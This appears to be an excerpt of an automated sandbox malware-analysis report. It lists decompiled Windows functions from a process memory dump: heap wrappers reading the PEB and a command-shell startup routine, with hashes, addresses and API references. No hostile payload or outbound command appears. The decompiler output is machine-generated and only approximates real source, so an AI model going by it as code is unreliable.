Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: a93c03a3d204ff53c042a9094da4b4fac5444f27b8b490fde5a74c4f475b6e15
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: C2E0DF32E41218FBDB21EAD99E85FAABBBDDB48A61F040196BA04DB150D5689E00C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 033AFF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E033AFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x33711a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E034688F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E033B0050(_t14);
				}
			}

0x033aff66
0x033aff6b
0x00000000
0x033aff8f
0x00000000
0x033aff8f

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5abd6d6ad7d9ab3f3e3387f499d99e1f34c6bdc13b6efada6e62374f1a64bbb7
Instruction ID: 94dbfc2831a200c09cb827be6b186eec07f1e5bce0989706ec7dc018ce11f68d
Opcode Fuzzy Hash: 5abd6d6ad7d9ab3f3e3387f499d99e1f34c6bdc13b6efada6e62374f1a64bbb7
Instruction Fuzzy Hash: CEE0DFB56057049FD734DB5ADCC0F2577ACDB42621F1D829EE0084F501C625D880C24A

Uniqueness

Uniqueness Score: -1.00%

Function 0344D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0344D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0339E8B0(__ecx, _a4, 0xfff);
					L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0344d38a
0x0344d39b
0x0344d3b1
0x00000000
0x0344d3b6
0x00000000

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 37df6ced2797f1b57f2aa571888d1f3ea49c028f3a896e4e2edae1e7e7df93ae
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: B3E08C35684244EBEB229A44CC00BA97A2ADF40BA1F104072BE085EAA1C6719C92D6C8

Uniqueness

Uniqueness Score: -1.00%

Function 033CA185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E033CA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x34867e4 >= 0xa) {
					if(_t5 < 0x3486800 || _t5 >= 0x3486900) {
						return L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E033B0010(0x34867e0, _t5);
				}
			}

0x033ca190
0x033ca1a6
0x033ca1c2
0x00000000
0x00000000
0x00000000
0x033ca192
0x033ca192
0x033ca19f
0x033ca19f

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0249221964ecf869f415fd5fb5676e32f2546293e1142068f5ddd1a760fa0b1f
Instruction ID: 74807b9bb3af0c8df890b0b8583d3ca3c801cd0b58fb913005335d8e0d8323fe
Opcode Fuzzy Hash: 0249221964ecf869f415fd5fb5676e32f2546293e1142068f5ddd1a760fa0b1f
Instruction Fuzzy Hash: 5DD02E65E310881AC72CF31898D4B2AB262EBC0B10F32084EF3070E9A0DF68CCD1824D

Uniqueness

Uniqueness Score: -1.00%

Function 033C16E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E033C16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E033C1710(0x34867e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L033B4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x033c16e8
0x033c16ef
0x033c16f3
0x033c16fe
0x00000000
0x033c1700
0x033c170d
0x033c170d
0x033c16f2
0x033c16f2
0x033c16f2
0x033c16f2

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ace26a1dfe443f7099a5fd158d75e1ba8936894c4836eda364607220a5b2608b
Instruction ID: 0d7cd046347fc7754e44cbab0bff26bb44394cc3e58c8e229d2808bd4cf5d2a4
Opcode Fuzzy Hash: ace26a1dfe443f7099a5fd158d75e1ba8936894c4836eda364607220a5b2608b
Instruction Fuzzy Hash: 00D0A731D1028052DA2DDB119C84B147251DB80B81F3C005CF60B4D8C2CFB5CCA2F14C

Uniqueness

Uniqueness Score: -1.00%

Function 033AAAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E033AAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x033aaab6
0x033aaabb
0x033fa442
0x00000000
0x033fa448
0x033fa454
0x033fa454
0x033aaac1
0x033aaac1
0x033aaac6
0x033aaac6

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 91c2b30e85596715fa8548f464e13a61d0c22e40989a9c930b173420eeb40893
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: F4D0E935352E80CFD616CF5DC998B1573A8FB44B44FC904E0E505CB761E62CDD84CA10

Uniqueness

Uniqueness Score: -1.00%

Function 033C35A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E033C35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E033AEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x033c35a1
0x033c35a1
0x033c35a5
0x033c35ab
0x033c35ab
0x033c35b5
0x00000000
0x033c35c1
0x033c35b7

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 59a79851c6ae0aaf7de618ab60bd17074e1efd3550a2a7f3f38a283ec052cd65
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 9FD0A73D8221C09DDB03EB10C59876873B5FB0022CF5C605D800105953C73D4D09D700

Uniqueness

Uniqueness Score: -1.00%

Function 0339DB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0339DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L033B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x0339db4d
0x0339db54
0x0339db5f
0x0339db56
0x0339db56
0x0339db5c
0x0339db5c

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 1ef4193baaaa86ecc238d9568cd5136d487430cb7a6e3ce7d130ee20be0c389d
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 6DC08C30690B00AAEB229F20CD42B4076A0BB00B01F4800A06300DA4F0DB7CD801E600

Uniqueness

Uniqueness Score: -1.00%

Function 0341A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0341A537(intOrPtr _a4, intOrPtr _a8) {

				return L033B8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0341a553

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 2f4201615679ad20209788786ca23608dcc18ee16fc121936ffb2f70d3f42fa1
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 28C01236180288BBCB12AE81CC01F46BB2AEB94B60F008010BA080E9708632E970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 033B3A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E033B3A1C(intOrPtr _a4) {
				void* _t5;

				return L033B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x033b3a35

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: f4d90b030a24551272f797fc820854993830fb0604ffb4bfcba3b5a07a2748d6
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 60C08C32480248BBC712AE42DC00F017B29E790B60F000020B7040A9618536EC60D58C

Uniqueness

Uniqueness Score: -1.00%

Function 033A76E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E033A76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x033a76e4
0x00000000
0x033a76f8
0x033a76fd

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: f425df1156570c0698c9c5c472d5754603495d7225f85dd19b2afbb7abee49b3
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 46C08C74141AC05BEB2AD74CCEE1B303664EF08708F4C019CBA010D8B1C368A803C308

Uniqueness

Uniqueness Score: -1.00%

Function 033C36CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E033C36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L033B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x033c36d2
0x033c36e8
0x033c36d4
0x033c36e5
0x033c36e5

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 9e7bfae482a3fd946a7731aad04b2a2eb16d0d5e9eea9cb3973f29b7f319ef98
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: C1C02B78561480BBD7159F30CDC0F147264F700A31F6C03587320498F0D52C9C00D204

Uniqueness

Uniqueness Score: -1.00%

Function 0339AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0339AD30(intOrPtr _a4) {

				return L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0339ad49

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 27f209798222a40348d1dcd5405ffa328b17311411cdd6e893b00d2d45e9f199
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: BEC08C32080288BBC712AA45CD41F117B29EB90B60F000020B6040EA618932E861D588

Uniqueness

Uniqueness Score: -1.00%

Function 033B7D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E033B7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x033b7d56
0x033b7d5b
0x033b7d60
0x033b7d5d
0x033b7d5d
0x033b7d5d

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: cb5c757ccdee7cb64afa60c6f6f28a1d5d6cab37ddf3706793f6c892ff4247e0
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 00B092343019408FCF16DF18C480B5533F8FB84AC0B8800D8E400CBA20D229E8008A00

Uniqueness

Uniqueness Score: -1.00%

Function 00343D27, Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 299
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00343D27(void* __ebx, intOrPtr* __ecx) {
				signed int _v8;
				char _v72;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v96;
				void* _v100;
				intOrPtr* _v104;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t26;
				void* _t29;
				void* _t30;
				WCHAR* _t36;
				intOrPtr _t57;
				WCHAR* _t59;
				int _t60;
				WCHAR* _t72;
				struct HINSTANCE__* _t76;
				intOrPtr* _t80;
				int _t88;
				WCHAR* _t89;
				WCHAR* _t91;
				void* _t95;
				void* _t98;
				short _t100;
				intOrPtr* _t109;
				WCHAR* _t113;
				short _t122;
				short* _t125;
				void* _t129;
				long _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t139;

				_t95 = __ebx;
				_t26 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t26 ^ _t138;
				_t133 = __ecx;
				_v104 = __ecx;
				 *0x363858 = 0x36385c;
				InitializeCriticalSection(0x36385c);
				EnterCriticalSection( *0x363858);
				_t131 = 0;
				 *0x35d544 = 0;
				LeaveCriticalSection( *0x363858);
				_t29 = SetConsoleCtrlHandler(E00356D90, 1);
				__imp___get_osfhandle(0x36387c);
				_t30 = GetConsoleMode(_t29, 1);
				__imp___get_osfhandle(0, 0x363878);
				_pop(_t98);
				GetConsoleMode(_t30, ??);
				E003406C0(_t98);
				 *0x363834 = E00343AAE();
				 *0x363830 = E00343B2C(_t98);
				E003441DD(_t133);
				_t36 = GetCommandLineW();
				_t3 =  &(_t36[1]); // 0x2
				_t125 = _t3;
				do {
					_t100 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t100 != 0);
				_t144 = (_t36 - _t125 >> 1) + 1 - 0x2000;
				if((_t36 - _t125 >> 1) + 1 > 0x2000) {
					_push(0);
					E0033C5A2(0x2000);
					_t103 = 0x400023df;
					do {
						__eflags = E00344B60(__eflags, 0);
					} while (__eflags == 0);
					L21:
					exit(1);
					L22:
					_push(_t131);
					E0033C5A2(_t103);
					_t103 = 0x2374;
					do {
						__eflags = E00344B60(__eflags, _t131);
					} while (__eflags == 0);
					goto L21;
				}
				_t103 =  &_v100;
				E00342A7C( &_v100, 0x2000, _t144);
				_t134 = _v100;
				if(_t134 == 0) {
					goto L22;
				}
				E00341040(_t134, 0x2000, GetCommandLineW());
				if(E00340C70(0x373ab0, ((0 |  *0x373cbc == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_push(0);
					E0033C5A2(0x373ab0);
					_t103 = 0x2374;
					do {
						__eflags = E00344B60(__eflags, 0);
					} while (__eflags == 0);
					goto L21;
				}
				_t108 =  *0x373cb8;
				if( *0x373cb8 == 0) {
					_t108 = 0x373ab0;
				}
				E003436CB(_t95, _t108,  *0x373cc0, _t131);
				E0033CEA9();
				_t109 = _t134;
				_t129 = _t109 + 2;
				do {
					_t57 =  *_t109;
					_t109 = _t109 + 2;
					_t149 = _t57 - _t131;
				} while (_t57 != _t131);
				E0033D3F4(_v104, _t149, _t134, _t109 - _t129 >> 1);
				_t59 =  *0x373cb8;
				_t130 = 0x373ab0;
				_t113 = _t59;
				if(_t59 == 0) {
					_t113 = 0x373ab0;
				}
				_t135 = 0x5c;
				_t136 = _v100;
				if( *_t113 == _t135) {
					_t103 = _t59;
					__eflags = _t59;
					if(_t59 == 0) {
						_t103 = _t130;
					}
					_t137 = 0x5c;
					__eflags = _t103[1] - _t137;
					_t136 = _v100;
					if(_t103[1] != _t137) {
						goto L10;
					} else {
						__eflags =  *0x378528;
						if( *0x378528 != 0) {
							goto L10;
						}
						__eflags = _t59;
						if(_t59 == 0) {
							_t59 = _t130;
						}
						E0033C5A2(_t103, 0x400023c8, 1, _t59);
						_t91 =  *0x373cb8;
						_t139 = _t139 + 0xc;
						__eflags = _t91;
						if(_t91 == 0) {
							_t91 = 0x373ab0;
						}
						__eflags = GetWindowsDirectoryW(_t91,  *0x373cc0);
						if(__eflags == 0) {
							do {
								__eflags = E00344B60(__eflags, _t131);
							} while (__eflags == 0);
							goto L21;
						} else {
							_t124 =  *0x373cb8;
							__eflags =  *0x373cb8;
							if(__eflags == 0) {
								_t124 = 0x373ab0;
							}
							_t130 = 0;
							E003433FC(_t95, _t124, 0, _t131, _t136, __eflags);
							goto L10;
						}
					}
				} else {
					L10:
					_t60 = GetConsoleOutputCP();
					 *0x363854 = _t60;
					GetCPInfo(_t60, 0x363840);
					E00343F80();
					_t64 = HeapAlloc(GetProcessHeap(), _t131, 0x20c);
					 *0x363874 = _t64;
					if(_t64 != 0 && _t64 == 0) {
						_t64 =  *0x363874;
						 *( *0x363874) = 0;
					}
					if( *0x373ccc == _t131) {
						__eflags = E0034269C(_t64);
						if(__eflags == 0) {
							goto L13;
						}
						__eflags =  *0x35d5a0 - _t131; // 0x0
						if(__eflags != 0) {
							L51:
							_t122 =  *0x35d5a0; // 0x0
							E00357DF1(_t122, _t136);
							goto L13;
						}
						_t88 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5),  &_v96);
						__eflags = _t88;
						if(_t88 == 0) {
							_t89 =  *0x35d5a0; // 0x0
						} else {
							_t89 = _v96.wAttributes;
							 *0x35d5a0 = _t89;
						}
						__eflags = _t89;
						if(__eflags == 0) {
							goto L13;
						} else {
							goto L51;
						}
					} else {
						L13:
						if( *((intOrPtr*)(_v104 + 8)) == _t131) {
							_v100 = E00356456(__eflags);
							E0033443C( &_v72);
							E0033C108( &_v72, 0x2350, 1,  &_v72);
							E003425D9(L"\r\n");
							_t72 = _v100;
							__eflags = _t72;
							if(_t72 == 0) {
								_push(_t131);
								_push(8);
								E0033C5A2( &_v72);
							} else {
								_push(_t72);
								E003425D9(L"%s");
								E003425D9(L"\r\n");
							}
							GlobalFree(_v100);
						}
						_t76 = GetModuleHandleW(L"KERNEL32.DLL");
						 *0x35d0d0 = _t76;
						 *0x36388c = GetProcAddress(_t76, "CopyFileExW");
						GetProcAddress( *0x35d0d0, "IsDebuggerPresent");
						 *0x363888 = GetProcAddress( *0x35d0d0, "SetConsoleInputExeNameW");
						_t80 = _v104;
						if( *_t80 != _t131 ||  *((intOrPtr*)(_t80 + 4)) != _t131 ||  *((intOrPtr*)(_t80 + 8)) != _t131) {
							_t131 = 1;
						}
						__imp__??_V@YAXPAX@Z();
						return E00346FD0(_t131, _t95, _v8 ^ _t138, _t130, _t131, _t136, _t136);
					}
				}
			}

0x00343d27
0x00343d2f
0x00343d36
0x00343d3f
0x00343d43
0x00343d46
0x00343d4b
0x00343d57
0x00343d63
0x00343d65
0x00343d6b
0x00343d78
0x00343d85
0x00343d8d
0x00343d99
0x00343d9f
0x00343da1
0x00343da7
0x00343db1
0x00343dbd
0x00343dc2
0x00343dc7
0x00343dcd
0x00343dcd
0x00343dd0
0x00343dd0
0x00343dd3
0x00343dd6
0x00343de5
0x00343de7
0x0034e043
0x0034e049
0x0034e04f
0x0034e050
0x0034e056
0x0034e056
0x0034e05a
0x0034e05c
0x0034e062
0x0034e062
0x0034e068
0x0034e06e
0x0034e06f
0x0034e075
0x0034e075
0x00000000
0x0034e079
0x00343def
0x00343df2
0x00343df7
0x00343dfc
0x00000000
0x00000000
0x00343e10
0x00343e38
0x0034e07b
0x0034e081
0x0034e087
0x0034e088
0x0034e08e
0x0034e08e
0x00000000
0x0034e092
0x00343e3e
0x00343e46
0x0034e094
0x0034e094
0x00343e53
0x00343e58
0x00343e5d
0x00343e5f
0x00343e62
0x00343e62
0x00343e65
0x00343e68
0x00343e68
0x00343e76
0x00343e7b
0x00343e80
0x00343e85
0x00343e89
0x0034e09e
0x0034e09e
0x00343e91
0x00343e95
0x00343e98
0x0034e0a5
0x0034e0a7
0x0034e0a9
0x0034e0ab
0x0034e0ab
0x0034e0af
0x0034e0b0
0x0034e0b4
0x0034e0b7
0x00000000
0x0034e0bd
0x0034e0bd
0x0034e0c4
0x00000000
0x00000000
0x0034e0ca
0x0034e0cc
0x0034e0ce
0x0034e0ce
0x0034e0d8
0x0034e0dd
0x0034e0e2
0x0034e0e5
0x0034e0e7
0x0034e0e9
0x0034e0e9
0x0034e0fb
0x0034e0fd
0x0034e11a
0x0034e120
0x0034e120
0x00000000
0x0034e0ff
0x0034e0ff
0x0034e105
0x0034e107
0x0034e109
0x0034e109
0x0034e10e
0x0034e110
0x00000000
0x0034e110
0x0034e0fd
0x00343e9e
0x00343e9e
0x00343e9e
0x00343eaa
0x00343eaf
0x00343eb5
0x00343ec7
0x00343ecd
0x00343ed4
0x0034e129
0x0034e130
0x0034e130
0x00343ef0
0x0034e140
0x0034e142
0x00000000
0x00000000
0x0034e148
0x0034e14f
0x0034e183
0x0034e183
0x0034e189
0x00000000
0x0034e189
0x0034e15e
0x0034e164
0x0034e166
0x0034e174
0x0034e168
0x0034e168
0x0034e16c
0x0034e16c
0x0034e17a
0x0034e17d
0x00000000
0x00000000
0x00000000
0x00000000
0x00343ef6
0x00343ef6
0x00343efc
0x0034e19b
0x0034e19e
0x0034e1ae
0x0034e1b8
0x0034e1bd
0x0034e1c3
0x0034e1c5
0x0034e1e1
0x0034e1e2
0x0034e1e4
0x0034e1c7
0x0034e1c7
0x0034e1cd
0x0034e1d7
0x0034e1dc
0x0034e1ef
0x0034e1ef
0x00343f07
0x00343f13
0x00343f29
0x00343f2e
0x00343f45
0x00343f4a
0x00343f4f
0x00343f5d
0x00343f5d
0x00343f5f
0x00343f77
0x00343f77
0x00343ef0

APIs

InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0036385C), ref: 00343D4B
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00343D57
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00343D6B
SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00356D90,00000001), ref: 00343D78
_get_osfhandle.MSVCRT ref: 00343D85
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00343D8D
_get_osfhandle.MSVCRT ref: 00343D99
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00343DA1

Part of subcall function 003406C0: _get_osfhandle.MSVCRT ref: 003406D8
Part of subcall function 003406C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,003538A5), ref: 003406E2
Part of subcall function 003406C0: _get_osfhandle.MSVCRT ref: 003406EF
Part of subcall function 003406C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 003406F9
Part of subcall function 003406C0: _get_osfhandle.MSVCRT ref: 0034071E
Part of subcall function 003406C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00340728
Part of subcall function 003406C0: _get_osfhandle.MSVCRT ref: 00340750
Part of subcall function 003406C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0034075A

Part of subcall function 00343AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00343A9F), ref: 00343AB2
Part of subcall function 00343AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00343ACD
Part of subcall function 00343AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00343AD4
Part of subcall function 00343AAE: memcpy.MSVCRT ref: 00343AE3
Part of subcall function 00343AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00343AEC

Part of subcall function 00343B2C: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00343DBB), ref: 00343B33
Part of subcall function 00343B2C: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00343DBB), ref: 00343B3A

